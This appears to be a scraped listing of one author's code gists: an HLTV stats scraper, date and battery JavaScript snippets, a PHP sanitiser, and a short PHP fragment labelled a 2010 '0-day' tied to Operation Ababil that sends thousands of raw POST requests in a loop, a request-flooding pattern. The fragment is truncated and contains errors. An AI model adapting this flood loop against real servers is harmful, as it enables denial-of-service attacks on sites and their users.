This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta http-equiv="content-type" content="text/html;charset=UTF-8"> | |
<meta name="viewport" content="width=device-width,height=device-height"> | |
<meta name="keywords" content="CS:GO items, Counter-Strike: Global Offensive items, CS:GO item database"> | |
<meta name="author" content="Anonymous"> | |
<title>CS:GO Item Database</title> | |
<link href="data:image/x-icon;base64,AAABAAEAEBAAAAAAAABoBQAAFgAAACgAAAAQAAAAIAAAAAEACAAAAAAAAAEAAAAAAAAAAAAAAAEAAAAAAAAfXbAAFkOQABApcAAeaLYAKorKACBvuQAQMX8ALpHNAAMMGwADCh4ABAwbAAQNHgAtltMACiNWABpWrgAUPosAFD+OABxgsQAcXrQAE0KXACeBywAIGUIALI3LABhNnQAQMH0AIG29ACyP0QAMNYMABAoWAAQLGQAaUaAABAwcACNzvQAhcsMABA0fACJ0wAAwk9QAL5bUADCW1AAFDiIAG1amABlVrAAbV6kAH3/GAAkjaQAlfMYAHV2pABlfrwAnfsMAKIrMACuHzAAkabIAKo7PAA4wfgAXS6EABAkUAC6RzwAECxoAETZ+AAQMHQADDSAALpPVAAQNIAAEDiMAGVSqACR2vgAZVqcAGleqACl6wQAeW60AFECTABVCkAAcXrYAFkGWACiFxwAphccADyhwABhGkwAqicoAHWm8ABAtdgAPLnkAGEqfAB9qvwAsjc0AK5DNABtOmQADChgABAoYACFwvwAhcrwABAsbAAQMHgAZUqUAMJLTAC6V0wADDSEAG1SiAC+W1gAE |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# HLTV stats reader written by ETC (EncodeTheCode) | |
import csv | |
with open("content.txt") as f:r=f.readlines();f.close(); | |
def l(n):return r[n-1] | |
def get_pos_team1(l): # Get team position in top 5 list | |
s=l.strip().split()[3:] | |
return strip_data_pos(s) | |
def get_pos_team2(l): # Get team position | |
return strip_data_team_pos(l) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# HLTV stats fetcher in bytes written by ETC (EncodeTheCode) | |
import urllib.request as u | |
user_agent='Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0.2 Waterfox/49.0.2' | |
headers={'User-Agent':user_agent} | |
req=u.Request('http://www.hltv.org/ranking/teams/',None,headers) | |
response=u.urlopen(req) | |
data=response.read() | |
response.close() | |
with open('content.txt','wb') as f:f.write(data);f.close() | |
if f.closed==1:print("Stream is closed.") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# HLTV stats fetcher in UTF-8 encoding written by ETC (EncodeTheCode) | |
import urllib.request as u | |
user_agent='Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0.2 Waterfox/49.0.2' | |
headers={'User-Agent':user_agent} | |
req=u.Request('http://www.hltv.org/ranking/teams/',None,headers) | |
response=u.urlopen(req) | |
data=response.read() | |
response.close() | |
page=data.decode('utf-8') | |
with open('content.txt','w') as f:f.write(page);f.close() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// 0-day vulnerability from 2010. Original code was written in Python by ETC (EncodeTheCode). | |
// AQCF (Operation Ababil) was a later variant for PHP written by some other coder(s) based on my code which takes concept to the web browser rather than via application. It's still somewhat the same in certain ways and I can't help but pointing it out. | |
$r=4000 // Requests | |
$num=9000 // Requests | |
for($i=0;$i<$r;$i++){ | |
fwrite($socket,"POST / HTTP/1.0\r\nHost: ".$host."\r\nAccept: "/"\r\nContent-Length: ".strlen($data)."\r\n\r\n".$data); | |
fclose($fp); | |
} | |
for($i=0;$i<$num;$i++){ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys as s | |
import platform as p | |
import subprocess as x | |
import math as m | |
global v | |
def ByteConvert(a): | |
if(a==0): | |
return '0B' | |
z=("B","KB","MB","GB","TB","PB","EB","ZB","YB") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var D=[new Date(),1,"/"];document.write((D[0].getDay()+D[1]-2)+D[2]+(D[0].getMonth()+D[1])+D[2]+D[0].getFullYear()); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var D=[new Date(),1,"/"];document.write((D[0].getDay()+D[1])+D[2]+(D[0].getMonth()+D[1])+D[2]+D[0].getFullYear()); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function battery_status(){function DecToPer(f){return(f*100)+'%';};var B=window.navigator.battery,A=[B.charging,B.chargingTime,B.dischargingTime,DecToPer(B.level),B.onchargingchange,B.onchargingtimechange,B.ondischargingtimechange,B.onlevelchange];return A;};var S=battery_status();document.write('<span class="orange">Battery Status:</span> <span class="green">'+S[3]+'</span> <span class="gray">(</span><span class="orange">Charging:</span> <span class="green">'+S[0]+'</span><span class="gray">,</span> <span class="orange">Charging Time:</span> <span class="green">'+S[1]+'</span><span class="gray">)</span>'); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function sanitize_string($s) { | |
$r=preg_replace('/[^-_a-zA-Z0-9 `´¨¢$!?#&£€@×÷§©®°«»¥¡¿µ™…\Â\â\á\Á\à\À\ã\Ã\Ê\ê\É\é\È\è\Ë\ë\Î\î\Í\í\Ì\ì\Ï\ï\^\¹\²\³\¼\½\¾\+\=\~\‹\›\|\(\)\{\}\[\]\·.\w]+/','',html_entity_decode($s,ENT_QUOTES)); | |
return $r; | |
} |